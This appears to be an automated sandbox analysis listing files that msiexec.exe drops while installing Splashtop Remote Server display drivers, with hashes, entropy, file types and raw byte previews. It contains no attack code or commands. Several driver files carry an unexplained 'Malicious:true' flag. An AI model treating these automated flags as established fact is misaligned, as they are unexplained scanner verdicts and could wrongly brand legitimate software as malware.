                                                                                                                                                                                                                                                                                                                                  MD5:D53AD812F1146CDDEA6A89806CC2439A
                                                                                                                                                                                                                                                                                                                                  SHA1:5102973DF29B7E70AD8845D3B5FA36DBEF294D56
                                                                                                                                                                                                                                                                                                                                  SHA-256:009DFAD5DEA03EA0C0B963EEA9CDCDB78668C8B35C19E2B92311D8703F00D6D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:38C2BFF7125F5BFD51A5D4D49D3C68BBCF9065057686AF8CAF7C3025BAE27CDFF4928BFB37C26A6ABAA750C699B99619E874CDD5EEF79F0E4010BB9ACCE56085
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;..D.|...|...|..v...~|...|..B|..v...r|..v...t|..v...~|..v...~|..v...~|..Rich.|..........PE..d....%.\.........." .....6...........1...............................................Q....@.........................................pC.......;...............`.......@.......p..0... ................................................................................text....4.......6.................. ..`.data...@....P.......:..............@....pdata.......`.......<..............@..@.reloc..Z....p.......>..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_iddcx.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):48640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8164297445194135
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xbWmecDs6zvVt94VbJqvhkqskgSjySwigs2K5m6Vj83h57zZ3ao:xbM6JX0Jq5kNGUsn5maI3h57zZ
                                                                                                                                                                                                                                                                                                                                  MD5:6A0CCBFF305B23A4BAE471025EC28D52
                                                                                                                                                                                                                                                                                                                                  SHA1:02519EC7FCC88969621B6DC7F1294DA4EA6EA611
                                                                                                                                                                                                                                                                                                                                  SHA-256:6659E90D80A2FA0CF9F6CE40E511D8763664E78820F27081935AC1BFD4723A19
                                                                                                                                                                                                                                                                                                                                  SHA-512:4D357E3E9B19E2C18D1D3A1E6916C542243D6FF24D783A526B9E1C1605C328CD079A77AEE38DFF19BEC66E584CFDB4DF910CF98DF668D1EB2E825E2D36F816F2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$................................................A................x)'....x) ..........[......[......[......^.-....[......Rich...................PE..L....%.\...........!.....N...2.......E.......`......................................}.....@..........................p..T....q.......................~...@..........0l..8...........................hl...............`..H............................text...;L.......N.................. ..`.rdata..\....`.......R..............@..@.data................n..............@....gfids...............p..............@..@.rsrc................r..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxyumd.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.623789818078503
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:0i+6wKkplcu1L3/xFxqFYOA555ZRlremv59jY3v:7+9cu1oF/Anq3v
                                                                                                                                                                                                                                                                                                                                  MD5:4276EDDE541ED3F488FA26778BDBB0D9
                                                                                                                                                                                                                                                                                                                                  SHA1:16E06CA60A9F8BCA515D193DFD28B120446BC178
                                                                                                                                                                                                                                                                                                                                  SHA-256:617F731B8F55F1AC23E47FE3C7CFD1110F198A5A9EB207FC485F739808446808
                                                                                                                                                                                                                                                                                                                                  SHA-512:280D6C3A85B26B4EE57534D33F035063B1DD56BA3671B48700833E4A61BEF1805C86316888AA5D8645603CA655F4172311B20C98533058823734C276A3CEA66B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v.X.v.X.v.X.+.Y.v.X.+.Y.v.X.(.Y.v.X.(.Y.v.X.(.Y.v.X.+.Y.v.X.v.X.v.X.+.Y.v.Xu(.Y.v.Xu(.Y.v.Xu(.Y.v.Xp(;X.v.Xu(.Y.v.XRich.v.X................PE..L....%.\...........!.....6..................P...............................0.......|....@.....................................<........................@..............8..............................@............P..$............................text....4.......6.................. ..`.rdata..Rw...P...x...:..............@..@.data...t...........................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxyumd32.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.623166316895491
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:3i+6wKkplcu1L3/xFxqFYOA555ZRlremv59jYWB:S+9cu1oF/AnqWB
                                                                                                                                                                                                                                                                                                                                  MD5:7CC448724952FA3B42A7B16DCBD4B50B
                                                                                                                                                                                                                                                                                                                                  SHA1:65CC211E57AE073EA89B188B66D3D473B403DEF5
                                                                                                                                                                                                                                                                                                                                  SHA-256:D90F351153CA9A51ECC24575B6A586A9A01AF24BD84F552F8305201260EE486A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1C8F6034B4BA71C5D4508263DEDB00098C583F7EA4F39AE281E680C8DDA3583A0FE7FD00DD601E652CA0D301D29800AD13FC102038D4A836F99D44E331D3B2FD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v.X.v.X.v.X.+.Y.v.X.+.Y.v.X.(.Y.v.X.(.Y.v.X.(.Y.v.X.+.Y.v.X.v.X.v.X.+.Y.v.Xu(.Y.v.Xu(.Y.v.Xu(.Y.v.Xp(;X.v.Xu(.Y.v.XRich.v.X................PE..L....%.\...........!.....6..................P...............................0............@.....................................<........................@..............8..............................@............P..$............................text....4.......6.................. ..`.rdata..Rw...P...x...:..............@..@.data...t...........................@....gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxywddm.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):95464
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7987777090492445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:nbZYULZ73iO/kwji3FWx+FJ4gwgDNSV2U5ANaudsJvdjsCIrqhZxu3hUlZNO:nHL53D/djPxaJ4gGQU5ANaudsjg9+hZk
                                                                                                                                                                                                                                                                                                                                  MD5:21E18A96C9A2E6F0838DA7BBD272CE21
                                                                                                                                                                                                                                                                                                                                  SHA1:C940F5069CE95083865D2D985682D51296B81257
                                                                                                                                                                                                                                                                                                                                  SHA-256:6CA7A9B8F2600181A4D47FA7090FF37E412687E7EA64BA5CAC4319277BE60C74
                                                                                                                                                                                                                                                                                                                                  SHA-512:1819469664C0DDE5ADFDA140313C32F9874301E103FF74E95AC684BAB71D06668299B8092564993727DF380E276B2400C1E1025D9527F637826BFCDFC9D78E66
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................................8......=.=....8......Rich....................PE..L....%.\.....................*.......@............@..........................p......`.......................................4A..<....P...............4...@...`..x... ...8...........................X...@............................................text...|........................... ..h.rdata..D...........................@..H.data...............................@...PAGE.....?.......@.................. ..`INIT....r....@...................... ..b.rsrc........P.......$..............@..B.reloc..x....`.......(..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\my_setup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.629648031240336
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:uMuUBfWPmqKebW1j2zAAHOOntqVuvTRKzOqUAY8JN77hhecs:JHqKyWMvUutVjO3hob
                                                                                                                                                                                                                                                                                                                                  MD5:955C309947C5CAEFFB429DBF12DC13A1
                                                                                                                                                                                                                                                                                                                                  SHA1:5079A801E91F9ACBE996FBCAE6D402B7E5FC72D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:59BBC2EBBA9CD056FBA8B80FC0E5DA9540D6E50F419216A1BB2A4B3E95AFB480
                                                                                                                                                                                                                                                                                                                                  SHA-512:BD4BBE228378466AD50F2B734438DDBD4FE8F6C7C3B573080834321C99E748512BE8511A927D4FD8B00635D320BEF7B245E05F174988F283B4339E1F8CED1BCE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=5.:yT.iyT.iyT.ip,QixT.iyT.iET.ip,WitT.ip,VixT.ip,GitT.ip,UixT.iRichyT.i........................PE..L....%.\...........!.....,..........-/.......@...............................`.......y....@......................... :......|3.......................6.......P..4...................................(...@............................................text....*.......,.................. ..`.data........@.......0..............@....reloc.......P.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\lci_iddcx.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10660
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.072232435699263
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:2vBYcjEdZubhLtaSu9sZscF8Bd1LUEduasnZH5:B0+ZKoqZsHLUHPnh5
                                                                                                                                                                                                                                                                                                                                  MD5:CCC20AC60F19430FBFDA6D49F164654C
                                                                                                                                                                                                                                                                                                                                  SHA1:425253D81B930175321A9B54AB4B6D736D6AF8A2
                                                                                                                                                                                                                                                                                                                                  SHA-256:D96B2FBFDD9245EA1D46994183917340912FE9A07AC569B4F70AD51123E55EDB
                                                                                                                                                                                                                                                                                                                                  SHA-512:F9B9AB9DCF0286F2A5635DD8BE1DF5F7718017EC580B46A217EC4B77615F7D7F0FEF4484886884A912172BF8F6C16252AD5E982205AACAB73152F65A67951475
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.)...*.H........).0.)....1.0...`.H.e......0..M..+.....7.....>0..:0...+.....7..........Q.E..\>.i+...171023021614Z0...+.....7.....0...0....R5.3.3.7.3.F.4.5.5.C.1.1.5.0.1.F.5.3.6.B.3.1.E.4.3.E.0.4.0.D.4.C.C.6.A.8.2.0.3.4...1..K0>..+.....7...100....F.i.l.e........l.c.i._.i.d.d.c.x...d.l.l...0M..+.....7...1?0=0...+.....7...0...........0!0...+........S7?E\.P.Sk1.>..L. 40V..+.....7...1H0F...O.S.A.t.t.r.......02.:.6...1.,.2.:.6...2.,.2.:.6...3.,.2.:.6...4...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RB.5.5.0.5.C.6.8.0.6.1.6.0.4.1.9.C.1.F.7.1.F.4.A.8.0.8.4.4.C.A.8.5.9.D.3.9.9.F.8...1..K0>..+.....7...100....F.i.l.e........l.c.i._.i.d.d.c.x...d.l.l...0M..+.....7...1?0=0...+.....7...0...........0!0...+.........P\h.......J..L.Y..0V..+.....7...1H0F...O.S.A.t.t.r.......02.:.6...1.,.2.:.6...2.,.2.:.6...3.,.2.:.6...4...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....RF.2.E.E.E.C.2.3

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\lci_iddcx.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4514
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7907010583152645
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:9G2XNDctEXHQ+C2C4kqWDZXpbdl5Vjnijla4UAiI6fOgTiYqG585wg3Jp:9XcWEDNRniWI6fyw5I
                                                                                                                                                                                                                                                                                                                                  MD5:9CF8CFC1E0815F7D72D136DE87B08EEA
                                                                                                                                                                                                                                                                                                                                  SHA1:F2EEEC23EC55758E5072619B62E6851234FA6D3C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9CA9C7A430D0B608F1A6ADDD9E2C17BF79845783356CE6230ECA1942A061B157
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D3FEE674C83B1E68CAE7F079F74A70931D432751420300DB77DB2B237A88D81AC3CD8B4B82532DCDDEE5D1DBEF3077ACD97B5890DFA0A497B97D7594E3C15F9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..;.....;.M.o.d.u.l.e. .N.a.m.e.:.....;. . . . .l.c.i._.i.d.d.c.x...i.n.f.....;.....;.A.b.s.t.r.a.c.t.:.....;. . . . .I.N.F. .f.i.l.e. .f.o.r. .i.n.s.t.a.l.l.i.n.g. .t.h.e. .L.C.I. .I.D.D.C.X. .D.r.i.v.e.r.....;.........[.V.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e.=.".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s.G.U.I.D. .=. .{.4.D.3.6.E.9.6.8.-.E.3.2.5.-.1.1.C.E.-.B.F.C.1.-.0.8.0.0.2.B.E.1.0.3.1.8.}.....C.l.a.s.s. .=. .D.i.s.p.l.a.y.....C.l.a.s.s.V.e.r. .=. .2...0.....P.r.o.v.i.d.e.r.=.%.L.C.I.%.....C.a.t.a.l.o.g.F.i.l.e.=.l.c.i._.i.d.d.c.x...c.a.t.....D.r.i.v.e.r.V.e.r.=.1.0./.2.3./.2.0.1.7.,.1...0...2.0.1.7...1.0.2.3.........[.D.e.s.t.i.n.a.t.i.o.n.D.i.r.s.].....D.e.f.a.u.l.t.D.e.s.t.D.i.r. .=. .1.2.....U.M.D.r.i.v.e.r.C.o.p.y.=.1.2.,.U.M.D.F. .;. .c.o.p.y. .t.o. .d.r.i.v.e.r.s.\.u.m.d.f.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...x.8.6.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.N.a.m.e.s...a.m.d.6.4.].....1.=.%.D.I.S.K._.N.A.M.E.%.,.,.........[.S.o.u.r.c.e.D.i.s.k.s.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\lci_proxywddm.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11975
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.929505838705397
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:qRVW/ujEdZubhLtaSu9sZscF8Bd1LUY6uasnZHou49L:k+ZKoqZsHLUcPnhou4t
                                                                                                                                                                                                                                                                                                                                  MD5:186504237027590F25BEA0EC539256C8
                                                                                                                                                                                                                                                                                                                                  SHA1:A74309D7CFA8EF410EC85D3801D27291E8BC915A
                                                                                                                                                                                                                                                                                                                                  SHA-256:4CBD88D04F9C3B3DE3625B25049EA6B7C1614FFEA8730667BFF01DD210415ED1
                                                                                                                                                                                                                                                                                                                                  SHA-512:9D4B89A95DBF8D0ABFC55AE44C9CBFB29EB64AB1FFFBB81FFAB4308ED4CFD040F9A883B2B7B7A375B1675DD08532378C38410F4DB737FBDA2913EB28DE18A933
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.....*.H..........0......1.0...`.H.e......0..p..+.....7.....a0..]0...+.....7........6Q..G...Z-.....171023021614Z0...+.....7.....0...0....R3.3.1.5.E.7.A.8.9.7.B.E.4.1.D.7.B.F.9.6.3.D.7.3.4.B.9.E.D.3.4.A.B.4.2.8.B.3.4.3...1..S0F..+.....7...1806...F.i.l.e.......$l.c.i._.p.r.o.x.y.w.d.d.m...s.y.s...0M..+.....7...1?0=0...+.....7...0...........0!0...+........3...A..=sK..J.(.C0V..+.....7...1H0F...O.S.A.t.t.r.......02.:.6...1.,.2.:.6...2.,.2.:.6...3.,.2.:.6...4...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R7.1.F.E.C.F.B.D.C.E.6.5.6.6.2.5.C.6.1.8.C.1.4.4.2.3.4.D.6.E.B.9.4.3.9.B.A.C.E.2...1..Q0D..+.....7...1604...F.i.l.e......."l.c.i._.p.r.o.x.y.u.m.d...d.l.l...0M..+.....7...1?0=0...+.....7...0...........0!0...+........q...ef%...D#Mn.C...0V..+.....7...1H0F...O.S.A.t.t.r.......02.:.6...1.,.2.:.6...2.,.2.:.6...3.,.2.:.6...4...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R7

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\lci_proxywddm.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2715
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.418922446200014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:qnch1OKbzLbS10bzPbSvb/mwwophwwoJOxWqrz61/zA9cjiJIjgW5FH1519HS4Bc:Pcua1YuSnEhn/A7ic4d4y
                                                                                                                                                                                                                                                                                                                                  MD5:07DC873615C74141FB8A646F6FE1D378
                                                                                                                                                                                                                                                                                                                                  SHA1:7E2D32A5ACE72B7F3919215B707096B52CC3B5EC
                                                                                                                                                                                                                                                                                                                                  SHA-256:F97F4A79BF9ACB0D7FFB257CB3E16687F6281B8687C79361B680764F3427EF61
                                                                                                                                                                                                                                                                                                                                  SHA-512:8D59EBD58BFCDBD0115C22148DDFB1DE73E3D0C2AA42B2772B75F12D76BFA4FC3E8356346F0BE9B8F5631443FBCCCFD63354235E701A966CE104BDDC9A4987AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;..;..;Module Name:..;..; lci_proxywddm.inf..;..;Abstract:..; LuminonCore Display Proxy Driver..;..;..[Version]..Signature="$WINDOWS NT$"..Class=System..ClassGuid={4d36e97d-e325-11ce-bfc1-08002be10318}..Provider=%LCI%..DriverVer=10/23/2017,1.0.2017.1023..CatalogFile=lci_proxywddm.cat....[DestinationDirs]..DefaultDestDir = 12..lci_proxywddm.CopyFiles = 12 ; drivers..lci_proxyumd.CopyFiles = 11 ; system32..lci_proxyumdwow.CopyFiles = 10, SysWow64 ; x64-specific....[SourceDisksNames.x86]..1=%DiskId1%, lci_proxywddm.sys,,\x86..1=%DiskId1%, lci_proxyumd.dll,,\x86....[SourceDisksNames.amd64]..1=%DiskId1%, lci_proxywddm.sys,,\x64..1=%DiskId1%, lci_proxyumd.dll,,\x64..1=%DiskId1%, lci_proxyumd32.dll,,\x64....[SourceDisksFiles.x86]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1....[SourceDisksFiles.amd64]..lci_proxywddm.sys = 1..lci_proxyumd.dll = 1..lci_proxyumd32.dll = 1......;*****************************************

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_iddcx.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):46528
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.272518240848504
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:ql+LPDB5MAHFg6IWSG1ucVPajIyouwc09euwjsV3xnxhc:ql+Lt5X4WSM1a8youwzOsVxA
                                                                                                                                                                                                                                                                                                                                  MD5:F018A1846A12B5DFF4A5FB0343745BBA
                                                                                                                                                                                                                                                                                                                                  SHA1:C8E871A51E43B5E71A4D1ACA0A791B375CABAC86
                                                                                                                                                                                                                                                                                                                                  SHA-256:3E5D8C95805CAECFC1BF5F689F036D1831E375E573F2B0BFFA4BBB59EA36B853
                                                                                                                                                                                                                                                                                                                                  SHA-512:7DECEBD14950548436EB110F93A5951ABE42B6CACF8A041F77DFCE923FFB28B6B399EC3166F0D64A1B098F9671F73E43D020977D7EC093F7B786038C4A05C3B8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........N.9./.j./.j./.j.q.k./.j.q.k./.j.q.k./.j.r.k./.j.WQj./.j.r.k./.j./.j./.j'.7j./.j'.3j./.j'.0j./.j.r.k./.j.q.k./.j.q.k./.j.q.k./.j.q=j./.j.q.k./.jRich./.j........................PE..d....P.Y.........." .....X...@......@T....................................................`.........................................P...P................................#.......... ...8...........................`................p...............................text....V.......X.................. ..`.rdata...%...p...&...\..............@..@.data...0...........................@....pdata..............................@..@.gfids..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxyumd.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):176576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.124833448410162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:WSNRRE5R1pHa9i/hXYTqHDh3ikNrgfxhxe74bgGY53Urb7:WS67jsKCT2d1NsDgGY5387
                                                                                                                                                                                                                                                                                                                                  MD5:37CF508FA1EB389ED85F822BAF9EF9B9
                                                                                                                                                                                                                                                                                                                                  SHA1:1720BEFADBD467FD715CE301545BC1FF02DB4681
                                                                                                                                                                                                                                                                                                                                  SHA-256:FA4CAC0B0361D85CE6220809FA85DFE3B295A187A7B58DD5FE5B06A7CE19F7FA
                                                                                                                                                                                                                                                                                                                                  SHA-512:B90CD035F83245EEDC1FC09ADEDFAC341411CFC47D130B891B2CC83B908F9F683DFFB140AA61F11B7BD15C8A5725070A92659CC567FA58F5879A1790B56833F5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Vj..7.R.7.R.7.R.j.S.7.R.j.S.7.R.i.S.7.R.i.S.7.R.i.S.7.R.j.S.7.R.7.R.7.R.j.S.7.RMi.S.7.RMi.S.7.RMi.S.7.RHi.R.7.RMi.S.7.RRich.7.R........PE..d....P.Y.........." .....r...*.......................................................F....`.........................................`M.......M..<................(.......#...........:..8...........................@:..................X............................text...`q.......r.................. ..`.rdata...............v..............@..@.data........`.......>..............@....pdata...(.......*...J..............@..@.gfids...............t..............@..@.rsrc................v..............@..@.reloc...............z..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxyumd32.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):131520
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5166932980708925
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Si+6w0ko6NDV3yLa/xzmqFq6/5GWRlrjmLS9jYIo3:h+xNDVCYFB/vqIo3
                                                                                                                                                                                                                                                                                                                                  MD5:A9D5E6605391A4CE7E3699D5C39BA851
                                                                                                                                                                                                                                                                                                                                  SHA1:54950896563D61917A4A61949E8B3552BC85A061
                                                                                                                                                                                                                                                                                                                                  SHA-256:EA06D1A20DDDBF33AA776DE2036651F5B2A2AFF9503A2D7174C11000F92D0396
                                                                                                                                                                                                                                                                                                                                  SHA-512:91FB4793621E8FDE6E62074F8545C4AFB636DBFAF3C236E803325DEE7B2CB33F5F1B183D565D11195912CF6DC2BBDA8F472D844AD8AF5C7738EFCB702D71BB59
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
